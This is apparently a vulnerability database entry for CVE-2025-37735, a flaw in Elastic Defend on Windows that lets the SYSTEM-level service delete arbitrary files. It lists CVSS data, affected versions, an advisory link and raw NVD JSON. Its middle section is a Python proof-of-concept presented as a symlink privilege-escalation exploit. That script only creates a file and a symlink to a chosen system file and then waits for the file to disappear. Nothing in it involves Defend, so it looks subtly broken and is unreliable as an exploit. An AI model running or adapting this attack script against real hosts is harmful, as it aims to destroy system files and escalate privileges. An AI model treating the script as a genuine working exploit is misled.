Security Vulnerability Report
CVE-2025-37735 CVSS 7.0 HIGH

CVE-2025-37735

Published: 2025-11-06 15:15:47
Last Modified: 2026-04-15 00:35:42

Description

Improper preservation of permissions in Elastic Defend on Windows hosts can lead to arbitrary files on the system being deleted by the Defend service running as SYSTEM. In some cases, this could result in local privilege escalation.

CVSS Details

CVSS Score: 7.0
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration (CPE) data available.

Affected versions: Elastic Defend 8.x < 8.19.6/9.1.6/9.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-37735 PoC - Elastic Defend privilege escalation
# The attacker uses a symbolic link to induce the Defend service to delete a system file
import os
import sys
import time


def create_symlink_attack(target_file, fake_file):
    """
    Set up the symlink attack scenario.
    target_file: the system file to be deleted
    fake_file: an attacker-controlled file path
    """
    try:
        # Create the attacker-controlled directory and file
        if not os.path.exists(fake_file):
            os.makedirs(os.path.dirname(fake_file) or '.', exist_ok=True)
            with open(fake_file, 'w') as f:
                f.write('malicious content for deletion')
        # Create a symbolic link pointing at the target system file
        # Note: requires SeCreateSymbolicLinkPrivilege
        os.symlink(target_file, fake_file + '_link')
        print(f'[*] Symlink created: {fake_file}_link -> {target_file}')
        print('[*] Waiting for Elastic Defend to process the file...')
        # Poll the target file for up to 30 seconds
        for _ in range(30):
            if not os.path.exists(target_file):
                print(f'[+] Target file deleted: {target_file}')
                return True
            time.sleep(1)
        print('[-] Target file still exists, exploit may have failed')
        return False
    except Exception as e:
        print(f'[-] Error: {e}')
        return False


def main():
    if len(sys.argv) < 3:
        print('Usage: python cve_2025_37735_poc.py <target_file> <fake_file>')
        print('Example: python cve_2025_37735_poc.py C:\\Windows\\System32\\some.dll C:\\Users\\Public\\malicious.dll')
        sys.exit(1)
    target = sys.argv[1]
    fake = sys.argv[2]
    print('[*] CVE-2025-37735 Elastic Defend Privilege Escalation PoC')
    print(f'[*] Target: {target}')
    print(f'[*] Fake path: {fake}')
    create_symlink_attack(target, fake)


if __name__ == '__main__':
    main()
```

References

Weakness: CWE-281 (Improper Preservation of Permissions)
Elastic security advisory ESA-2025-23: https://discuss.elastic.co/t/elastic-defend-8-19-6-9-1-6-and-9-2-0-security-update-esa-2025-23/383272
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-37735",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-06T15:15:46.640",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Improper preservation of permissions in Elastic Defend on Windows hosts can lead to arbitrary files on the system being deleted by the Defend service running as SYSTEM. In some cases, this could result in local privilege escalation."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 7.0,
            "baseSeverity": "HIGH",
            "attackVector": "LOCAL",
            "attackComplexity": "HIGH",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.0,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-281"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://discuss.elastic.co/t/elastic-defend-8-19-6-9-1-6-and-9-2-0-security-update-esa-2025-23/383272",
        "source": "[email protected]"
      }
    ]
  }
}
```